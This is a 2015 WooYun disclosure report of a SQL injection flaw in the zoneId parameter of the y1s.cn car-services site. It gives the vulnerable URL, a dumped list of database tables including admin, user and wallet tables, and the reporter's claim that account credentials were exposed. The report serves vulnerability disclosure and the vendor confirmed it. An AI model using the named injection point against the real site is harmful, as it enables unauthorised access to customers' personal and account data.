当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139530

漏洞标题:有壹手主站MySQL注射漏洞(涉及234表/可导致整站用户信息泄露)

相关厂商:北京有壹手汽车科技有限公司

漏洞作者: 路人甲

提交时间:2015-09-07 17:25

修复时间:2015-10-22 18:18

公开时间:2015-10-22 18:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-07: 细节已通知厂商并且等待厂商处理中
2015-09-07: 厂商已经确认,细节仅向厂商公开
2015-09-17: 细节向核心白帽子及相关领域专家公开
2015-09-27: 细节向普通白帽子公开
2015-10-07: 细节向实习白帽子公开
2015-10-22: 细节向公众公开

简要描述:

望走大厂商

详细说明:

注入点zoneId

http://y1s.cn/index.php?g=home&m=zone&a=detail&zoneId=162


虽然库不多,表包含很多信息

Database: imeiche
[179 tables]
+-----------------------------------------+
| imc_accelerate |
| imc_act_channel_code_list |
| imc_act_channel_sendcode_log |
| imc_activities |
| imc_activities_zone |
| imc_activitieschannelsetup |
| imc_activitiescode |
| imc_activitiescodesetup |
| imc_activitiescodesetup_service |
| imc_activitiestransfer |
| imc_ad |
| imc_adboard |
| imc_admin |
| imc_article |
| imc_baidu_order |
| imc_balance_record |
| imc_balance_session |
| imc_booking |
| imc_bookinginfo |
| imc_brand |
| imc_business |
| imc_business_bill |
| imc_business_servicetype |
| imc_business_templete |
| imc_business_washingtype |
| imc_call_record |
| imc_car |
| imc_cargroup |
| imc_carwash |
| imc_case_img |
| imc_caseimg |
| imc_category |
| imc_channel |
| imc_channel_bill |
| imc_channel_business |
| imc_channel_moka_receivedata |
| imc_channel_price |
| imc_channel_setting |
| imc_channel_stat_log |
| imc_city |
| imc_comment_multiple |
| imc_commuting_time |
| imc_compen |
| imc_compkami_channel_business |
| imc_compkami_channel_price |
| imc_compkami_user |
| imc_consumer_details |
| imc_countdeposit |
| imc_counter |
| imc_coupon_service |
| imc_customer_info |
| imc_customer_order |
| imc_customer_order_insuranceinfo |
| imc_customer_order_log |
| imc_dashang_amount |
| imc_dashang_stat |
| imc_discount_set |
| imc_ditui |
| imc_ditui_ticheng |
| imc_ditui_user_stat |
| imc_electriccar_apply |
| imc_employee |
| imc_employee_ability |
| imc_employee_mobilize_log |
| imc_employee_worktime |
| imc_employeeresult |
| imc_employeewashwork |
| imc_employeeworkinfo |
| imc_employeeworkinfo_dis |
| imc_firstprice |
| imc_flink |
| imc_freesingle |
| imc_getsendcar_address_usual |
| imc_group |
| imc_icode_order |
| imc_icode_userecord |
| imc_initcarwash |
| imc_insurance_order |
| imc_insurance_order_related |
| imc_ipadcode |
| imc_joinus |
| imc_kalad |
| imc_loginfo |
| imc_member |
| imc_memberservice |
| imc_memberservice_consumer |
| imc_memberservice_renewals |
| imc_membertype |
| imc_memberwashprice |
| imc_menu |
| imc_message_log |
| imc_mobileequipment |
| imc_msg_control |
| imc_msg_num |
| imc_msg_tpl |
| imc_msgtplsetting |
| imc_nav |
| imc_notice |
| imc_online_customer |
| imc_order_attach |
| imc_orders |
| imc_orders_stype |
| imc_package |
| imc_package_workinfo |
| imc_package_zone |
| imc_parkingroom |
| imc_parkinguselog |
| imc_preferential_record |
| imc_price |
| imc_province |
| imc_qa |
| imc_qatype |
| imc_remind |
| imc_reworkreason |
| imc_right |
| imc_servertczone |
| imc_servertechnics |
| imc_servicetype |
| imc_servicetype_workingstep |
| imc_setting |
| imc_shop_grade |
| imc_shop_service_grade |
| imc_spring |
| imc_stat_channel_record |
| imc_stock |
| imc_stockintosales |
| imc_stocksalesrecords |
| imc_stocktype |
| imc_sub_account |
| imc_sys_emailconfig |
| imc_sys_firstprice |
| imc_sys_msgtpl |
| imc_sys_servicetype |
| imc_sys_servicetype_workingstep |
| imc_sys_washingtype |
| imc_sysnotice |
| imc_systips |
| imc_systips_config |
| imc_temporary_activity |
| imc_url |
| imc_user |
| imc_user_code |
| imc_user_complaint |
| imc_user_menu |
| imc_user_shop |
| imc_user_sitemsg |
| imc_user_tip |
| imc_user_weixin |
| imc_vehicleinformation |
| imc_videoinfo |
| imc_waitphone |
| imc_wallet |
| imc_wallet_log |
| imc_washprice |
| imc_washwork |
| imc_work |
| imc_work_workingstep |
| imc_workbalance |
| imc_workbalance_profin |
| imc_workbalanceinfo |
| imc_workcheckcost |
| imc_workinfo |
| imc_workingroom_apply |
| imc_workingroom_employeesetting |
| imc_workingroom_entity |
| imc_workingroom_entityservice |
| imc_workingroom_entitystep |
| imc_workingroom_entityworkinfo |
| imc_workingroom_entityworkinfo_employee |
| imc_workingroom_msg |
| imc_workwashstock |
| imc_workwashstock_balance |
| imc_wx_camera |
| imc_wx_pushlog |
| imc_wxtplsetting |
| imc_zone |
| imc_zone_join |
| imc_zone_servicetype_setting |
| imc_zone_workstep_blackworker |
+-----------------------------------------+
Database: information_schema
[59 tables]
+-----------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_PER_INDEX |
| INNODB_CMP_PER_INDEX_RESET |
| INNODB_CMP_RESET |
| INNODB_FT_BEING_DELETED |
| INNODB_FT_CONFIG |
| INNODB_FT_DEFAULT_STOPWORD |
| INNODB_FT_DELETED |
| INNODB_FT_INDEX_CACHE |
| INNODB_FT_INDEX_TABLE |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_METRICS |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_DATAFILES |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESPACES |
| INNODB_SYS_TABLESTATS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| OPTIMIZER_TRACE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+-----------------------------------------+

漏洞证明:

1.jpg


各种账号 密码 沦陷

2.jpg


3.jpg


由于敏感信息太多,不深入了, 怕被厂商拉着我打

修复方案:

危险你懂,求礼物

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-07 18:18

厂商回复:

谢谢关注。

最新状态:

暂无


漏洞评价:

评论